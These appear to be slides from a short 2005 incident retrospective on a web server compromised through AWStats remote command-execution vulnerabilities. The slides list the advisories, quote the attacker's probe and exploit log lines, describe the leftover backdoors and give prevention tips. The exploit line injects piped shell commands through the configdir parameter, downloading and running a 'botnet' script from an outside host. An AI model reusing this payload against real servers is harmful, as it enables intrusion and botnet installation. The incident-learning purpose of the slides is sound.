The Anatomy of a Hack March 2005
The vulnerabilities…. • 2005-02-25: AWStats Plugin Multiple Remote Command Execution Vulnerabilities • 2005-02-16: AWStats Logfile Parameter Remote Command Execution Vulnerability • 2005-02-16: AWStats Rawlog Plugin Logfile Parameter Input Validation Vulnerability • 2005-02-16: AWStats Remote Command Execution Vulnerability • 2005-02-14: AWStats Debug Remote Information Disclosure Vulnerability • 2005-01-15: AWStats Multiple Unspecified Remote Input Validation Vulnerabilities
AWStats Multiple Unspecified Remote Input Validation Vulnerabilities (15 Jan) • Multiple unspecified remote input validation vulnerabilities affect AWStats. These issues are due to a failure of the application to perform proper validation on user-supplied input prior to using it to carry out some critical function. • Although unconfirmed an attacker may leverage these issues to execute commands and disclose sensitive information with the privileges of the underlying Web server.
AWStats Remote Command Execution Vulnerability (16 Feb) • AWStats is reported prone to a remote arbitrary command execution vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data. • An attacker can prefix arbitrary commands with the '|' character and have them executed in the context of the server through a URI parameter.
The First Probe… [05/Mar/2005:01:29:55 -0600] "GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
The Exploit… [13/Mar/2005:19:17:12 -0600] "POST /cgi-bin/awstats.pl?configdir=|echo%20;echo%20;killall%20%20perl;cd%20/tmp;wget%20ssh.a.la/botnet;perl%20botnet;rm%20botnet;echo%20;echo| HTTP/1.0" 200 414 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
Results of Exploits • Left lots of litter in /tmp • Opened up multiple listeners (est. 6) • Most were botnet daemons or backdoors • Clean up has been fun and educational • No damage to the system just had my ego dinged up a little • Valuable reminder – Don’t get complacent
How I could have prevented it • Stay on top of vulnerabilities • They are always shortly followed by exploits • Patch/Upgrade as soon as possible • Review logs and check your file systems • I.e. /tmp would have been and easy tip-off • Know what listeners are running and check them regularly